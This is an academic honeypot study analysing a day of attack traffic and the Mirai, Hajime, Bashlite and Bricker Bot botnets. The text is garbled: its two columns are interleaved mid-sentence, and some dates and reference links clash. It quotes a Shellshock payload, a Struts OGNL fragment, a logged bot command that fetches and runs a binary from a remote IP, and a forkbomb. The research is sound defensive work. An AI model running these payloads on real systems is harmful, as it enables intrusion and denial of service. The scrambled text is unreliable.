Analysis of 24 Hours Internet Attacks a Brief Overview of Malicious Traffic Targeting Featureless Servers on the Web

Analysis of 24 Hours Internet Attacks A Brief Overview of Malicious Traffic Targeting Featureless Servers on the Web

Tim Britton 1 , Ian Liu-Johnston 1 , Ian Cugnière 1 , Swati Gupta 1 , Danton Rodriguez 1 , Julien Barbier 1 , Sebastien Tricaud 2 1 Holberton School 2 H oneynet Project

Abstract: We first set up a bare Amazon AWS For the past decades, bots and botnets instance whose data center resides in have been on the front page of newspapers and Ashburn, Virginia. To get a general overview are one of the main topics of discussion in the of the traffic that would come to the server, news media. The range of the attacks and their we did not run any services that would be targets have been increasing.1 A recent useful to anybody else, and did not connect example, the Mirai network - a botnet built the Internet Protocol (IP) address to any through insecure Internet of Things (IoT) domain name. Very shortly after renting the devices -, has been at the center of attention server, we set up a packet capture for a after it provoked an internet outage primarily 24-hour period with tshark/wireshark. We on the East Coast.2 A study also found that “80 did this to identify the most promising percent of spam was sent by botnets by 2009”.3 traffic/protocols to observe and concentrate Despite this, most of our everyday life relies our efforts on. We then analyzed the packet heavily on the internet and is still vulnerable to capture file with tools such as malicious attacks. This paper aims to explore tshark/wireshark, Computer Incident where such attacks originate and how the Response Center’s (CIRCL) Border Gateway attacks occur. We set up and decided to Protocol (BGP) ranking API, and p0f. observe what happens to an internet-facing server that should not encounter anything but 1.1 BGP Rankings local network activity. To investigate further, CIRCL’s BGP Ranking provides data to we set up honeypots on that server to see how calculate the security ranking of Internet the flow of traffic changed, and what bots and Service Providers (ISPs).4 We compared the other clients would do. We wish to share our list of IP addresses that accessed our server findings and thus humbly contribute to more during the initial 24-hour period to calculate awareness about the risks faced by anyone the risk assessment for these IP addresses.5 using the internet. The closer the BGP ranking is to zero, the more malicious the IP address is. At the time, 1. Introduction & Methodology the most malicious IP in our logs scored 0 out of 13,043. This IP address accessed the TCP In order to observe malicious activity on the internet we set clear steps to decide port 3380, which is used by the SNS Channels. which methodology to adopt based on the Other notable ports and protocols that were traffic we would receive. accessed by high risk IP addresses were various ephemeral ports such as the Intel

Remote Desktop Management Interface ● The SIP protocol is often used for (IRDMI) protocol, the port 8089, and the port enterprise-level telecommunication 81 (TorPark Onion routing). See Table 1.0 for systems; the list of the most malicious IP addresses we ● The SSH protocol represents many captured (as of February 13rd, 2017): bruteforce attempts and accounts for more than half of the total traffic from our initial packet capture; ● The Telnet protocol: The Mirai botnet and its successor Hajime exploit this protocol, as IoT devices - which often use Telnet - comprise the majority of targeted systems. We thus used honeypots to attract the traffic that targets the protocols above and analyzed the data they produced.6 Honeypots are pieces of software designed to reproduce the same functionality as vulnerable servers, and can act as decoys to attract intruders.

In this paper, we will first detail the

traffic observed per protocol. Then, we will We realized that some protocols were expand on the botnets’ patterns that we were attracting remarkably more traffic than able to notice. It will allow us to better grasp others. For example, for application layer how these botnets infect and interact with a protocols, we recorded 255,796 connection targeted system. attempts through Secure Shell (SSH), while we received only 1 connection to the 2. Protocols of interest Connection-less Lightweight Directory Access

Protocol (CLDAP), cf. table 1.1 in Annex. 2.1 HTTP

“The Hypertext Transfer Protocol (HTTP) 1.2 Protocol Selection is an application-level protocol for distributed, While the scope of this paper might collaborative, hypermedia information systems. It is seem enormous, if not quixotic, after parsing a generic, stateless, protocol which can be used for the data, we decided to focus our efforts on many tasks beyond its use for hypertext, such as the following protocols: the Hypertext name servers and distributed object management Transfer Protocol (HTTP), the Session systems, through extension of its request methods, error codes and headers.” 7 Initiation Protocol (SIP), SSH, and the Telecommunications Network (Telnet) Because HTTP is one of the most protocol. These protocols were selected for widely used protocols on the internet, it is the following reasons: also one of the main vectors for exploitation. ● The HTTP protocol is the most widely We recorded 245 HTTP packets during our used protocol on the internet, and initial 24-hour packet capture. thus provides the biggest resource for To investigate this protocol further, exploits; we setup a web-application honeypot, Glastopf, running in a Docker container. This

honeypot provided basic functionality to To give us a broader picture of record GET or PUT requests, IP addresses, possible connections, we decided to run Uniform Resource Identifiers (URIs), and Glastopf for a much longer period of time. In timestamps. It was also designed to simulate addition, we wrote a basic honeypot in SQL vulnerabilities and record injection NodeJS to run simultaneously and compare attempts. We launched this honeypot the traffic from both servers.8 The custom alongside another packet capture for a second honeypot served a static authentication page 24-hour period on March 7th, 2017. and had logging capabilities. We ran both web servers on port 80 for a 12-day period. By doing so, we were able to cross-reference the data obtained from those sources, which gave us a more refined understanding of the kind of attacks currently

The resulting logs from Glastopf did not yield much data, possibly because of specialized functionality, and possibly because Glastopf is an older honeypot. In total only 14 connections were made, two of which were requests for meta-release-lts, and targeting the HTTP protocol (cf. Table 2.0 /phpmyadmin/scripts/setup.php, while and Table 2.1). the rest were for the website root.

In our observations of the Glastopf leveraged the Shellshock vulnerability in logs, the majority of client requests were for other logs. PHPMyadmin and vulnerable Wordpress Another series of notable exploit plugins. There were various other requests to attempts leveraged a recent vulnerability in interesting URIs such as /system.ini, the Apache Struts web framework.10 /struts2-showcase/, and This exploit was revealed March 7th, /current-config/passwd. Regardless of 2017. The initial log entries were dated where the requests originated from, be it shortly after the exploit was publicly Bangalore, Austria or the United States, the released. There were multiple exploit attacks were fairly homogenous between our attempts that used the same methodology as in the exploit-db python script.11 The exploit honeypots and relied on well-known attack vectors. works by leveraging a vulnerability in parsing The most interesting log entries for the Content Type header field, which allows remote code execution.12 the NodeJS honeypot provided links to trojans and other binaries. They were sent to Subsequent attempts were our servers in various HTTP headers, with the enumeration techniques from Metasploit 13 modules, that followed this convention: ability to install and execute malware through known exploits. %{#context['com.opensymphony.xwork2. One type of malicious request dispatcher.HttpServletResponse'].add attempted to leverage an exploit known as Header('tkplpyg','tkplpyg')}.multipa rt/form-data “Shell Shock” or “Bashdoor”,9 which was The first few malicious clients made public in 2014. It exploited a downloaded a malicious script for Linux and vulnerability in web servers that uses Bash to a binary named “UnInstall.exe” for Windows. process the User-Agent header for certain This binary was also found during the same requests. The User-Agent string would be time period in a pirated torrent of Skyrim. sent as a malformed function definition with The Linux script stopped all firewalls, bash commands immediately following the set the DNS server to 8.8.8.8, removed any function definition. Such a string could adopt instances of Apache from /etc/init.d/ and the following format: instances of the malicious binary. Then it ( ) { :;}; /bin/bash -c ‘echo downloaded a series of dynamic libraries as vulnerable’ The Shellshock exploit in our logs well as the malicious binary masquerading as attempted to download a shell script, a Perl an Apache process. script, and a tar archive renamed to have a The binary itself was a bitcoin miner .jpg extension. The tar archive compressed all based off of cpuminer2.3.3, that mined into the Stratum mining pool.14 It used the hash other files. The shell script created a crontab that would re-download the trojan and verify algorithm cryptonight, with the username that the service was running. All Bash scripts “sqwukiomcage.” This illustrates the recent ensured persistence for the Perl script trend of increasing attacks aimed at named “DDoS Perl IrcBot v1.0 / 2012 by cryptocurrencies. DDoS Security Team”. We also encountered a Next, it set a crontab to download and modified version of the Perlbot that also execute the script again, and checked through “known_hosts” in all “.ssh” directories, and in

all “.bash_history” files to find any servers 31st, we saw 1,075 connections, with a total that were connected through ssh. Finally it of 306 unique IP addresses, connect to the downloaded the trojan onto those new Telnet honeypot server. 835 of those 1,075 servers. connections resulted in the connecting party successfully logging in (providing any two 2.2 Telnet - esp. IoT Honeypot lines of input for a username and password), “The purpose of the TELNET Protocol is to with 267 unique IPs logging in. Of the 835 provide a fairly general, bi-directional, eight-bit logins, 750 were generated by bots that byte oriented communications facility. Its primary successfully connected and created enough goal is to allow a standard method of interfacing traffic to fit into an identifiable pattern. We terminal devices and terminal-oriented processes to observed patterns left by the following each other. It is envisioned that the protocol may variants of Mirai: Mirai scanner, Mirai/Ecchi also be used for terminal-terminal communication ("linking") and process-process communication downloader, OBJPRN Mirai variant, Hajime (distributed computation).” 15 downloader, and the Mirai 'xkajdnabw' Telnet is an unsafe protocol as all variant. Around November 2016, the Mirai information (including authentication) is source code was released to the general exchanged over plain text. Nonetheless, it is public. Mirai’s original source code continues still used for IP cameras, routers and other to be modified and new variants spread and IoT devices to allow remote system keep infecting vulnerable devices. The administration, such as firmware upgrades. It variants mentioned previously echo concerns is used instead of SSH on these devices about Mirai being an easily replicable and highly adaptable botnet.18 because it is easy to implement and lightweight, making it acceptable for devices The countries of origin from our without a lot of resources. analysis directly correlated to some of those Telnet was the second port to attract that were observed by experts in the field of the most traffic, with 606 interactions cybersecurity: Taiwan, Russia, South Korea, detected during the 24-hour capture. We Turkey, China, the United States, Brazil, and Iran (see Map 2.0).19 decided to study Telnet because of the aforementioned trend regarding botnets, such as Mirai, targeting IoT devices. Our intention was to study how those trends - noted by many experts - translate in near real-time observation. We thus decided to investigate further. In order to do so, we installed H-M-S Telnet honeypot16 in order to become the target of a more consequent flux of attacks/interactions. This honeypot has no specific content but does mimic a GoAhead wifi camera based on an exploit uncovered by Pierre Kim.17 Focusing on IoT devices paid off as the traffic captured demonstrates. On March

2.3 SIP 2.4 SSH SIP is based on an HTTP-like “The Secure Shell (SSH) is a protocol for secure request/response transaction model and is used to remote login and other secure network services establish, modify, and terminate multimedia over an insecure network.” 23 sessions such as audio or video calls, Internet Although statistically we got an telephony call.20 enormous volume of SSH connection The SIP protocol caught our attention attempts, we decided not to investigate the for several reasons. Not only did it account for protocol as thoroughly as HTTP or Telnet a significant portion of the traffic we received, because the traffic is mostly comprised of but most of its applications are in enterprise brute force attempts. telecommunication systems. While the number of connection However, SIP ended up being a attempts was significant, the vast majority of disappointing lead as the only packets we the attempts came from three IP addresses observed were generated by SIPVicious. whose geolocation data corresponded to the As noted by Cisco: Guangdong and Jiangsu areas in China. To be “The tool could also be used to scan the IP or VoIP precise, 130,598 of the 140,606 SSH telephony network. Due to a flaw in the processing connection attempts we analyzed, came from of SIP messages by the telephony device firmware, just three IP addresses. In fact, over 99.8% or an attacker could use any number or any SIP 140,417 of the SSH connection attempts address in the INVITE message to scan random appeared to have originated from China. The networks to determine availability of live hosts. The highest number of connection attempts from attacker could initiate an INVITE session and determine a successful detection by receiving a an IP address whose geolocation data was phone ring as a response. This detection could allow outside of China was 49. the attacker to conduct further attacks such as host A general trend we noticed by spoofing to make phone calls using the detected IP analyzing the auth logs from the 24-hour phone identity.”21 capture on the AWS server was IP addresses It can also be used in a non-malicious trying to connect via SSH as root on all ports 22 way to audit a network. from 1-65535, which may explain the high All the packets were transferred over volume of traffic from individual IP UDP, using the second version of the SIP addresses. When we analyzed the auth logs protocol. The headers of the SIP packets show from the DigitalOcean server, we noticed that connection attempts. The To and From there were a number of bruteforce attempts Header fields indicate that after the initial against a range of user names, but not against INVITE request, attackers tried random a range of ports, contrary to the AWS strings in the Contact header field to directly instance. connect with a user at another end. Let us note that the results of this 3. Botnets detected traffic may be attributed to a recent release of After having briefly mentioned the Botnets SIPVicious. The latest release of SIP vicious encountered, we will expand on that subject occurred on February 4th. We ran our initial as it is one of the most notable and worrying packet capture concurrently on February 4th trends in today’s security landscape. - 5th.

3.1 Hajime control (C&C) servers, displaying the According to Rapidity Network, following message on infected systems: Hajime was first spotted around October 5th, 2016.24 The traffic generated is similar to Just a white hat, securing some Mirai’s; after sequentially using a list of systems. randomly generated passwords, Hajime Important messages will be signed attempts to open a new shell, and uses the like this! Hajime Author. /bin/busybox trick seen with Mirai (with Contact CLOSED ECCHI normally) to verify whether it is inside Stay sharp! an actual shell. Then, it checks /proc/mounts, and attempts to go to a seemingly random Like the other botnets found, Hajime's effects directory and to run a set of commands to are only stored in memory, and resetting the ensure that it can actually write to the device will clear it back to the same insecure directories listed. Hajime also checks to see if settings Hajime found the device with. it has access to netcat or wget, and finally, runs the Data Duplicator (DD) command 3.2 Mirai against /bin/echo to grab the first 52 bytes Mirai is likely the most famous botnet, and analyze the Executable and Linkable found to be responsible for a record-breaking Format (ELF) header, to get architecture 620 Gbps DDoS attack.25 On October 21st, information for the current machine. 2016, Dyn’s DNS infrastructure was hit with Finally, Hajime will download a script an attack of a similar Gbps output, drawing for the appropriate architecture with wget (if Mirai into the public spotlight.26 On Twitter, accessible and if the control server has that Octave Klaba, the founder and owner of OVH, resource). reported attacks thought to stem from Mirai, reaching over 1Tbps.27 Many researchers 2017-03-31 05:22:16,698 - RECEIVED have done their own study of Mirai whose INPUT 202.174.185.162 : ['rm .s; source code was released around October 1st, wget http://73.9.22.205:49511/.i; 2016, on Hackforums, by a user called chmod +x .i; ./.i; exit'] Anna-Senpa.38 This latter source includes 2017-03-31 05:22:17,498 - RECEIVED INPUT 202.174.185.162 : ['q'] everything from the scanner, the loader, even 2017-03-31 05:22:17,504 - Lost an API where customers can be allowed connection to 202.174.185.162:39189 access to the C&C server to direct attacks. As a result of the source being leaked, Other researchers have noted that it countless modified strains have been found in will attempt to echo-assemble a binary if the wild and continue to be found. wget and nc are unavailable. In this case, the Mirai first scans the environment it downloaded malware has an MD5 sum of has penetrated. It logs on by randomly 91a02956678c4ff6aa9075cfe99db24d. selecting username/logins from a The purpose of Hajime is unknown predetermined list. Once it is in the system, it and open to speculation. The Hajime binary attempts to determine whether it is in a shell actually attempts to block the ports that Mirai or not using shell and, checking access to the uses to communicate with its command and /bin/busybox MIRAI path to ensure it is

receiving the proper response ( torture', Synchronization Acknowledgment M IRAI: applet not found). (SYN/ACK) floods, Generic Routing If it receives the expected response, Encapsulation (GRE) IP, Ethernet flooding, the Mirai downloader, ECCHI, shows up next. and HTTP flooding. It starts out with similar commands to the scanner, running shell and sh, and then 3.3 Bashlite /bin/busybox ECCHI. Next, it checks the The Bashlite malware, like Qbot and output of ps so as to discover other running its derivatives, has been around since at least processes. The Mirai source carries a list of early 2015 and the source is easy to find.29 processes to destroy, namely other botnets. If HackForums and LeakedFiles list several, and any are found, it will run against even GitHub has several repos with the kill -9 them. This is a territorial act, as it wants to source. The HackForums user Anna-Senpai ensure it is the only botnet in control of the even references it in the original forum post device. where the Mirai source code was posted: Like Hajime, it checks “However, I know every skid and their mama, /proc/mounts for mounted filesystems and cycles through it's their wet dream to have something them to determine access. besides Qbot.” and then references the speed To prep for the impending download, of Mirai versus Qbot: “Bots brute Telnet using Mirai copies /bin/echo, empties it, and then an advanced SYN scanner that is around 80x chmod’s it to ensure it can execute the file. The faster than the one in Qbot, and uses almost last step before it can download is to cat 20x less resources.” /bin/echo. The bot ignores everything but A quick Google search results in the ELF header, and simply checks it for the numerous YouTube videos and forum posts architecture information. with tutorials on how to set up Qbot. Most Then, it checks for wget and tftp, and uses versions of Qbot lack any kind of honeypot whichever is available. Mirai downloads the detection, and simply log in and try to dump architecture specific file. Mirai supports x86, their malware. Each client malware is MIPS, MPSL, ARM, ARM5, ARM7, PPC, SPC, cross-compiled for different architectures, as M68K, and SH4 architectures, and the source we can see at one of the GitHub links.30 NTPD actually includes a cross compiler for this is MIPS, bash is x86, tftp is ARMv6, etc. reason. Then it downloads it to the prepared Basically, it attempts to download every dvrHelper file and runs it. That done, it runs possible file and run every possible one, the script and exits out, its mission hoping one will be the right architecture to accomplished. infect the client. The malicious binary causes a Qbot/bashlite generally contains connection between the device and the Mirai capabilities for HTTP, UDP and TCP flooding C&C server. The device will begin the same attacks, but with so many sources available scanning routine seen previously, alerting the the attack vectors can differ from bot to bot. C&C server of insecure bots so it can be hit by a loader and added to the botnet. The 3.4 Bricker Bot connection can also be used to broadcast a Bricker Bot made the headlines May multitude of DDoS attacks to the clients: UDP 4th, 2017, after a RadWare article revealed flood, Valve query flooding, 'DNS water details about the bot.31 It returned to the

spotlight on April 21st, 2017, with a generated string, which was different each BleepingComputer article that claimed to time it connected. have found the author of Bricker Bot.32 The honeypot was modified for the Bricker Bot is a grey-hat bot. It passwd command to 'work'; running passwd attempts to log in to insecure Telnet devices would lock the honeypot out to anyone but and disable them, either temporarily or those using the provided password, and in 48 permanently. Bricker Bot uses Tor exit nodes hours of uptime, we did not witness any login to conceal the actual IP of the attacking attempt using the generated password. device. On April 4th, 2017, the honeypot went Its self-proclaimed creator, under the down for approximately 6 hours and nickname janit0r, claims to have bricked thereafter stopped receiving traffic. It is around 2 million devices. According to worth noting that we had set up two other Radware Bricker Bot would have honeypots - one of them in the same permanently disabled some IoT devices, but DigitalOcean region - that never received any its actual impact remains unknown. traffic from that bot. The only difference On April 2nd, 2017, the honeypot being that the honeypot attracting Bricker server saw several different attack patterns Bot traffic was spun up in early March, matching either Bricker Bot or that of a whereas the other two honeypots were not similar botnet. Variations of the Bricker Bot started until the end of March. attack pattern were seen 21 times, originating The last time the honeypot monitored from 6 different IPs. The bot collected the OS any Bricker Bot-like activity was April 24th, information from and 2017, with some slight differences compared /proc/version uname -a, checks shadow/passwd, and checked the to the previous patterns observed. This time, contents of /etc/. Then, after running su root it left a message in the ‘message of the day’ to ensure that the user was root, it attempted (motd) file warning that the system had been to run a forkbomb by creating a function that hacked, and then immediately returned to repeatedly forked itself: forkbomb it. The traffic resulted in 180 logins d(){ d|d & };d 2>/dev/null in one day, from two IPs. Traffic received in the same timeframe and for several days caused the Conclusion honeypot to hang on the passwd command, More than twenty years ago, John which the bot seemed to follow minutes later Perry Barlow in his Declaration of the by trying to kill every running process and Independence of Cyberspace called for a reboot. civilization “more humane and fair” than that Another type of traffic encountered, of governments. However, and as mentioned more malicious, redirected /dev/urandom to above, the number of malware attacks keeps random device descriptors, attempting to increasing at an incredible pace. When we clear the IP route and setting max threads to started our research for this paper, Mirai was one. the most malicious botnet in terms of scope. After fixing the bug that caused the As of this writing WannaCry/WannaCrypt honeypot to hang on the 'passwd' command, seems poised to take its place in the we could see that the bot was attempting to headlines. change the password to a randomly

The source of attempted exploits observed spans across the whole globe. Featureless servers encounter a consequent Acknowledgments amount of traffic, but that volume is even This work would not have been possible greater when the server has a purpose, such without Sebastien Tricaud, the founder of the as an IP camera, or a Wordpress website with French Honeynet chapter, to whom we are a domain name. especially indebted. He provided us guidance Interestingly, we discovered that most and leadership every step of the way, of the attacks rely on old malware, which allowing us to succeed as a team. tends to indicate that those attacks are still A co-founder of Holberton School, Julien successful and thus that steps to prevent Barbier’s help was invaluable. Not only did he them are largely ignored. Indeed, these introduce us to Sebastien, but he also gave us exploits mostly rely on improperly configured the opportunity, as students, to discover more or outdated software, and generic about the field of information security. username/password combinations. We are grateful to Richard Sim and Philip The attack patterns we recorded for Yoo, both students at Holberton School, for HTTP, SSH, and SIP relied on generic exploit proofreading this paper and contributing to attempts that seemed to scan a range of IP making it better. addresses for well-known vulnerabilities. Telnet, on the other hand, relied on even simpler intrusion methods, by bruteforcing with default username and password Annex combinations. Sometimes, these spray-and-pray attacks immediately attempted to download antiquated scripts, or more contemporary trojans, but none of the recorded attempts were covert enough to evade detection or overcome simple protective measures. On the other hand, we came across more recent attacks among which several variants of the Mirai botnet. Albeit more recent, those botnets also rely on weak or nonexistent security measures on the part of their targets. While this paper reaches its conclusion, our work is not done and we will keep developing our honeypots so as to respond more dynamically to malicious connection attempts.

[Accessed 2 May 2017]. References 7. IETF. 1999. RFC 2616 - Hypertext Transfer Protocol. [ONLINE] Available 1. Lillian Ablon, Martin C. Libicki, Andrea A. Golay. 2017. Golay Markets at: for Cybercrime Tools and Stolen Data. https://tools.ietf.org/html/rfc2616. RAND. pp. 21-23. [ONLINE] Available [Accessed 13 May 2017]. at: 8. Ian Liu-Johnston. 2017. nodeJS_honeypot. [ONLINE] Available https://www.rand.org/content/dam/ rand/pubs/research_reports/RR600/ at: RR610/RAND_RR610.pdf. [Accessed 2 https://github.com/ianliu-johnston/n May 2017]. odeJS_honeypot. [Accessed 13 May 2. Lily Hay Newman. 2017. What We 2017]. 9. CVE. 2014. CVE-2014-6271. [ONLINE] Know About Friday’s Massive East Coast Internet Outage. Wired. Available at: [ONLINE] Available at: https://cve.mitre.org/cgi-bin/cvenam https://www.wired.com/2016/10/in e.cgi?name=CVE-2014-6271. ternet-outage-ddos-dns-dyn/. [Accessed 2 May 2017]. 10. CVE. 2017. CVE-2014-6271. [ONLINE] [Accessed 2 May 2017]. 3. Lillian Ablon, Martin C. Libicki, Available at: Andrea A. Golay. 2017. Golay Markets https://cve.mitre.org/cgi-bin/cvenam for Cybercrime Tools and Stolen Data. e.cgi?name=CVE-2017-5638. RAND. pp. 21-23. [ONLINE] Available [Accessed 2 May 2017]. 11. Exploit Database. 2017. Apache Struts at: https://www.rand.org/content/dam/ 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution. [ONLINE] Available rand/pubs/research_reports/RR600/ RR610/RAND_RR610.pdf. [Accessed 2 at: May 2017]. https://www.exploit-db.com/exploits 4. CIRCL. 2017. BGP Ranking. [ONLINE] /41570/. [Accessed 13 May 2017]. 12. Terrence DeJesus. 2017. Apache Available at: Struts 2 Exploit Analysis. NTT Security. https://www.circl.lu/projects/bgpran king. [Accessed 13 May 2017]. [ONLINE] Available at: 5. CIRCL. 2016. Bgpranking-redis-api. https://www.solutionary.com/resour [ONLINE] Available at: ce-center/blog/2017/03/apache-stru ts-2-exploit-analysis/. [Accessed 18 https://github.com/CIRCL/bgprankin g-redis-api. [Accessed 13 May 2017]. May 2017]. 6. William W. Martin. 2001. Honey Pots 13. CXSecurity.com. 2017. Apache Struts and Honey Nets - Security through Jakarta Multipart Parser OGNL Deception. SANS Institute. [ONLINE] Injection - CXSecurity.com. [ONLINE] Available at: Available at: https://www.sans.org/reading-room https://cxsecurity.com/issue/WLB-2 017030143. [Accessed 18 May 2017]. /whitepapers/attacking/honey-pots- 14. Pooler. 2017. cpuminer: CPU miner for honey-nets-security-deception-41. Litecoin and Bitcoin. [ONLINE]

Available at: [Accessed 13 May 2017]. https://github.com/pooler/cpuminer. 21. Cisco. 2014. SIPVicious SIP Auditing [Accessed 18 May 2017]. Tool Activity. [ONLINE] Available at: 15. IETF. 1983. RFC 854 - Telnet Protocol https://tools.cisco.com/security/cent Specification. [ONLINE] Available at: er/viewAlert.x?alertId=33141. https://tools.ietf.org/html/rfc854. [Accessed 2 May 2017]. [Accessed 13 May 2017]. 22. Kali Linux. 2014. SIPVicious Package 16. Tim Britton and Holden Grissett. Description. [ONLINE] Available at: 2017. telnet-honeypot. [ONLINE] http://tools.kali.org/sniffingspoofing Available at: /sipvicious. [Accessed 2 May 2017]. https://github.com/h-m-s/telnet-hon 23. IETF. 2006. RFC 4253 - The Secure eypot. [Accessed 13 May 2017]. Shell (SSH) Transport Layer Protocol. 17. Pierre Kim. 2017. Multiple [ONLINE] Available at: vulnerabilities found in Wireless IP https://tools.ietf.org/html/rfc4253. Camera (P2P) WIFICAM cameras and [Accessed 13 May 2017]. vulnerabilities in custom http server. 24. Sam Edwards, Ioannis Profetis. 2016. [ONLINE] Available at: Hajime: Analysis of a decentralized https://pierrekim.github.io/blog/201 internet worm for IoT devices. 7-03-08-camera-goahead-0day.html. [ONLINE] Available at: [Accessed 2 May 2017]. https://security.rapiditynetworks.co 18. John Costello , Allison Nixon , Brian m/publications/2016-10-16/hajime.p Hein , Ronnie Tokazowski , Zach df. [Accessed 13 May 2017]. Wikholm . 2016. New Mirai Variant 25. KrebsOnSecurity. 2016. Leaves 5 Million Devices Worldwide KrebsOnSecurity Hit With Record Vulnerable — High Concentration in DDoS. [ONLINE] Available at: Germany, UK and Brazil. Flashpoint. https://krebsonsecurity.com/2016/0 [ONLINE] Available at: 9/krebsonsecurity-hit-witth-record-d https://www.flashpoint-intel.com/bl dos/. [Accessed 13 May 2017]. og/cybercrime/new-mirai-variant-inv 26. Dyn. 2016. Dyn Statement on olved-latest-deutsche-telekom-outage 10/21/2016 DDoS Attack. [ONLINE] /. [Accessed 2 May 2017]. Available at: 19. Roland Dobbins. 2016. Mirai IoT https://dyn.com/blog/dyn-statement Botnet Description and DDoS Attack -on-10212016-ddos-attack/. Mitigation. ARBOR Networks. [Accessed 13 May 2017]. [ONLINE] Available at: 27. Octave Klaba. 2016. we got 2 huge https://www.arbornetworks.com/blo multi DDoS: 1156Gbps then 901Gbps. g/asert/mirai-iot-botnet-description- [ONLINE] Available at: ddos-attack-mitigation/. [Accessed 2 https://twitter.com/olesovhcom/stat May 2017]. us/778019962036314112. [Accessed 20. IETF. 2002. RFC 3261 - Session 13 May 2017]. Initiation Protocol. [ONLINE] 28. KrebsOnSecurity. 2017. Who is Available at: Anna-Senpai, the Mirai Worm Author?. https://tools.ietf.org/html/rfc3261. [ONLINE] Available at:

https://krebsonsecurity.com/2017/0 1/who-is-anna-senpai-the-mirai-wor m-author/. [Accessed 13 May 2017].

29. India Ashok. 2016. One million IoT devices infected by Bashlite malware-driven DDoS botnet. International Business Times. [ONLINE] Available at: https://www.ibtimes.co.uk/one-milli on-iot-devices-infected-by-bashlite-m alware-driven-ddos-botnet-1578870. [Accessed 13 May 2017]. 30. geniosa. 2016. qbot. [ONLINE] Available at: https://github.com/geniosa/qbot/blo b/master/cc7.py.txt. [Accessed 13 May 2017]. 31. Radware. 2017. ”BrickerBot” Results In PDoS Attack. [ONLINE] Available at: https://github.com/geniosa/qbot/blo b/master/cc7.py.txt. [Accessed 13 May 2017]. 32. Catalin Cimpanu. 2017. BrickerBot Author Claims He Bricked Two Million Devices. BleepingComputer. [ONLINE] Available at: https://www.bleepingcomputer.com/ news/security/brickerbot-author-clai ms-he-bricked-two-million-devices/. [Accessed 13 May 2017].